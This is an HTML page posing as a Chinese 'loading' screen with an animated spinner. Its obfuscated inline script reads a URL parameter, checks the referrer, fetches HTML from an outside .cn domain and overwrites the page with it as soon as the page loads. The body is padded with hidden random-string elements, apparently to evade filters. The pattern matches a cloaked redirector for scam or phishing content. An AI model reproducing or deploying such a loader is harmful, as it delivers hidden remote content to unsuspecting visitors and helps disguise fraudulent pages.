<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .pNsLr6Soh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .pNsLr6Soh .CJONaWT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .pNsLr6Soh .content {
            line-height: 50px;
            text-align: center
        }

        .pNsLr6Soh .img {
            width: 100%
        }

        .pNsLr6Soh .jgiJEoiPI {
            text-align: center
        }

        .pNsLr6Soh .jgiJEoiPI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .pNsLr6Soh .jgiJEoiPI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .pNsLr6Soh .jgiJEoiPI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .pNsLr6Soh .jgiJEoiPI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .pNsLr6Soh .jgiJEoiPI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .pNsLr6Soh .jgiJEoiPI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .pNsLr6Soh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Fkw8CWz4T(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EWd0t = Fkw8CWz4T('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EWd0t +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EWd0t +".html?a=share";
		}
		
        CjHbgvEOt=url+"#"+new Date().getTime();
        CjHbgvEOt && function() {
            $.get(CjHbgvEOt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >uHhiGewMkzNV7AddBPZJp6PpeSBF2PDVQPkTnFBoEZw8TD8G3eHGiq2fvcco1qOSHDIkfDwS1uo41VJJZmBSx1WqQX</b>
<span style='display:none'>XrisqHY26cBKdHc3haj5xxOmNwm1mDhWiFVHHlYi1SXHeA60yK8KeEk0H3YiAPKYDWUjMLjJGF</span>
<li style='display:none' >UpsTfgBeeEbQcJ93cf</li>
<span style='display:none'>XrisqHY26cBKdHc3haj5xxOmNwm1mDhWiFVHHlYi1SXHeA60yK8KeEk0H3YiAPKYDWUjMLjJGF</span>
<img  src='' style='display:none'><div class="pNsLr6Soh">
    <div class="CJONaWT">
        <div class="jgiJEoiPI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >EwbyYHaTv3w9HyT4yyew7sJiNhlgZbo9YBB1n6JO3SNQuR6qU8qnMyB0yNbDj4CwW3jcFiQL6VbZjiEmH6TWIKZUAR</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>w0MCSjVQk7AtoViU99mtidboRaTdljILMeclCotcLV34qBBYI</a>
<a  href='#' style='display:none'>w0MCSjVQk7AtoViU99mtidboRaTdljILMeclCotcLV34qBBYI</a>
<a  href='#' style='display:none'>w0MCSjVQk7AtoViU99mtidboRaTdljILMeclCotcLV34qBBYI</a>
<p  style='display:none'>cfDcsOR3wpGlrRcGVSPCIWwqDR4ylJ40fzah3SX2Zg4jJBNO3NsAb5J</p></body>
</html>